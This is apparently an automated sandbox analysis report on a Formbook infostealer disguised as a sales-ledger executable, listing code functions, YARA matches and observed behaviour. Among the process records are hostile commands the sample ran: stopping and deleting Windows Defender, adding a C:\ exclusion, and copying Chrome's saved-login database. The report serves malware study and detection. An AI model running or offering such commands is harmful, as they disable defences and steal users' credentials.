Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AB40 24_2_0121AB40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122EBB0 24_2_0122EBB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B03DA 24_2_012B03DA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BDBD2 24_2_012BDBD2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFA2B 24_2_012AFA2B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C22AE 24_2_012C22AE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2D07 24_2_012C2D07
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F0D20 24_2_011F0D20
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1D55 24_2_012C1D55
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C25DD 24_2_012C25DD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120841F 24_2_0120841F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BD466 24_2_012BD466
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1FF1 24_2_012C1FF1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012CDFCE 24_2_012CDFCE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01216E30 24_2_01216E30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BD616 24_2_012BD616
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2EF7 24_2_012C2EF7
Source: C:\Windows\explorer.exe Code function: 25_2_061C5A72 25_2_061C5A72
Source: C:\Windows\explorer.exe Code function: 25_2_061C8ABB 25_2_061C8ABB
Source: C:\Windows\explorer.exe Code function: 25_2_061C0B20 25_2_061C0B20
Source: C:\Windows\explorer.exe Code function: 25_2_061C0B22 25_2_061C0B22
Source: C:\Windows\explorer.exe Code function: 25_2_061BC072 25_2_061BC072
Source: C:\Windows\explorer.exe Code function: 25_2_061BC06D 25_2_061BC06D
Source: C:\Windows\explorer.exe Code function: 25_2_061C4882 25_2_061C4882
Source: C:\Windows\explorer.exe Code function: 25_2_061BDCF2 25_2_061BDCF2
Source: C:\Windows\explorer.exe Code function: 25_2_061BDCF0 25_2_061BDCF0
Source: C:\Windows\explorer.exe Code function: 25_2_061C3152 25_2_061C3152
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8D466 32_2_04D8D466
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD841F 32_2_04CD841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D925DD 32_2_04D925DD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDD5E0 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91D55 32_2_04D91D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92D07 32_2_04D92D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC0D20 32_2_04CC0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92EF7 32_2_04D92EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8D616 32_2_04D8D616
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE6E30 32_2_04CE6E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9DFCE 32_2_04D9DFCE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91FF1 32_2_04D91FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D928EC 32_2_04D928EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB090 32_2_04CDB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D920A8 32_2_04D920A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81002 32_2_04D81002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9E824 32_2_04D9E824
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCF900 32_2_04CCF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE4120 32_2_04CE4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D922AE 32_2_04D922AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FA2B 32_2_04D7FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D803DA 32_2_04D803DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8DBD2 32_2_04D8DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFEBB0 32_2_04CFEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAB40 32_2_04CEAB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D92B28 32_2_04D92B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2E3A2 32_2_02B2E3A2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2EB37 32_2_02B2EB37
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B19E3E 32_2_02B19E3E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B19E40 32_2_02B19E40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B12FB0 32_2_02B12FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2E41B 32_2_02B2E41B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B12D90 32_2_02B12D90
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: String function: 011FB150 appears 48 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04CCB150 appears 66 times
PE file contains strange resources
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314971887.00000000029BF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324334005.00000000076A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSycdovrq.dll" vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.323803137.00000000074B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000000.311950591.00000000007A8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375859659.000000000147F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378517009.0000000001659000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
Uses 32bit PE files
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/14@2/1
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 9_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 13_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 9_2_004095FD
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 9_2_0040A33B
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 9_2_00401306
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File read: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
Source: unknown Process created: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmmon32.exe File written: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: Require your Sales Ledger from 01-April-2020.exe, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, u0002u2000.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Yara detected Costura Assembly Loader
Source: Yara match File source: Require your Sales Ledger from 01-April-2020.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300, type: MEMORY
Source: Yara match File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, type: DROPPED
Source: Yara match File source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0040289F
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_0057A5EC push es; ret 0_2_0057A71A
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E27191 push ecx; ret 0_2_04E271A5
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E21B58 push esp; retf 0_2_04E21B59
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B550 push eax; ret 9_2_0040B564
